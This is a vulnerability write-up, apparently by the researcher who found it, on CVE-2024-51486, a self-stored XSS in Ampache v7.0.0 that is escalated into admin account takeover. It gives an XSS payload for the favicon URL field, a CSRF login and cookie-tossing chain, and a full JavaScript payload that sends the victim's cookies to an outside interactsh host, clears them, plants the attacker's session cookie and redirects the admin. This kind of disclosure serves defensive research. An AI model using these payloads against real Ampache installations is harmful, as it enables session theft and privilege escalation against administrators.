CVE-2024-51486 | Ampache v7.0.0 XSS | Admin Account Compromise
Introduction to CVE-2024–51486
CVE-2024-51486 identifies a critical security vulnerability in the application that threatens user data and system integrity. This self-stored XSS (Cross-Site Scripting) flaw allows an attacker to execute JavaScript in a user’s browser, resulting in unauthorized actions and potential account takeover. The risk is further amplified as this self-stored XSS can be exploited into a stored XSS vulnerability.
What is Ampache
Ampache is an advanced web-based media streaming application designed to manage and play audio and video files online. It empowers users to organize, access, and stream their media collections from anywhere, making it a versatile tool for music and video enthusiasts.
The platform features a user-friendly interface that allows users to easily upload and manage their media without requiring extensive technical skills, making it accessible to a wide audience. Additionally, Ampache supports multiple platforms, enabling users to stream their media on various devices, including computers, smartphones, and tablets, which significantly enhances accessibility.
One of Ampache’s standout features is its ability to stream high-quality audio and video in real time, ensuring an enjoyable user experience. It also offers integration with various tools and services, providing flexibility in how users can manage and play their media. As an open-source project, Ampache allows users to customize the software to meet their specific needs, further increasing its utility.
Developed by a dedicated community of contributors, Ampache has grown into a robust platform that continues to evolve. Its extensive capabilities and ongoing development are a testament to the commitment of its community, making it a remarkable achievement in the realm of media streaming solutions.
Exploitation Phase
Now that you clearly understand what Ampache is, let’s delve deeper into the specifics of this CVE and explore how an attacker might exploit it. We will begin by demonstrating a straightforward vulnerability and then illustrate a relevant use case in which an attacker could leverage this vulnerability against an administrator to gain elevated privileges.
Simple Exploitation
To exploit the self-stored XSS vulnerability in the interface section, you first need to create an account with catalog manager access. Once you have access, enter the following payload in the “Custom URL — Favicon” field: xss" onfocus="alert(1)" autofocus tabindex="1". When the favicon is rendered, this will trigger an alert, effectively demonstrating the presence of the vulnerability.
A recommendation for addressing this issue is to implement input sanitization. This process involves thoroughly cleaning and validating all user inputs to ensure that potentially harmful characters or scripts are removed or neutralized before the application can process them.
Attacker Scenario Exploiting the Vulnerability
To effectively exploit this vulnerability and amplify its impact, it’s possible to leverage some knowledge to transform the self-stored XSS into a standard stored XSS. In the following video, I will walk you through the steps I took to enhance a similar vulnerability, demonstrating how it can be escalated for greater effect.
The following video demonstrates the exploitation process for CVE#1, and the same principles apply here, with one key difference: the required access level. To exploit this vulnerability, you need catalog manager access, whereas CVE#1 only requires standard user access.
In summary, here are the steps we took to convert this self-stored XSS into a standard stored XSS.
- CSRF Login:
- The attacker creates a malicious link hosted on https://xss.expert.com/ampache. When the victim clicks this link, it triggers a CSRF request that logs the admin into the attacker’s account on ampachev7.hacking-poc.com.
2. Self-XSS Payload Injection:
- A self-XSS payload is executed, performing the following actions:
- Captures the attacker’s cookies.
- Saves the cookies to local storage.
- Clears all cookies, logging out the admin upon page refresh.
- Sets the attacker’s cookie with the specific path /index.php, which takes precedence over others due to its specificity.
- When the admin logs back in and visits /index.php, the application will use the attacker’s cookies for the session.
4. Redirection to Login:
- The admin is redirected to /login.php to re-authenticate.
5. Accessing /index.php:
- Upon logging in, the admin accesses /index.php while still having the attacker’s cookies.
- The self-XSS script exfiltrates all cookies (both the attacker’s and the admin’s).
This series of vulnerabilities allows you to escalate the self-stored XSS into a full-fledged stored XSS.
To clarify, here is the Self-XSS JavaScript that executes both when the admin is logged into the attacker account and when the admin is logged in using the user’s cookie.
const interactsh = 'x123.oast.fun';
const cookieData = encodeURIComponent(document.cookie);
const img = new Image();
img.src = `https://${interactsh}/?cookie=${cookieData}`;
const getCookieValue = (cookieName) => {
const cookie = document.cookie.split('; ').find(row => row.startsWith(`${cookieName}=`));
return cookie ? cookie.split('=')[1] : null;
};
const ampacheCookieValue = getCookieValue('ampache');
const ampacheUserCookieValue = getCookieValue('ampache_user');
if (ampacheCookieValue) {
localStorage.setItem('ampacheBackup', ampacheCookieValue);
}
if (ampacheUserCookieValue) {
localStorage.setItem('ampacheUserBackup', ampacheUserCookieValue);
}
const savedAmpacheValue = localStorage.getItem('ampacheBackup');
const savedAmpacheUserValue = localStorage.getItem('ampacheUserBackup');
if (savedAmpacheUserValue === 'user') {
document.cookie = 'ampache=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; domain=ampachev7.hacking-poc.com';
document.cookie = 'ampache_lang=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; domain=ampachev7.hacking-poc.com';
document.cookie = 'ampache_user=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; domain=ampachev7.hacking-poc.com';
document.cookie = 'PHPSESSID=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; domain=ampachev7.hacking-poc.com';
document.cookie = 'ampache=' + ampacheCookieValue + ';path=/index.php';
window.location.href = 'https://ampachev7.hacking-poc.com/login.php';
}Other References
For the latest updates on my developments and research, be sure to check out my GitHub profile.
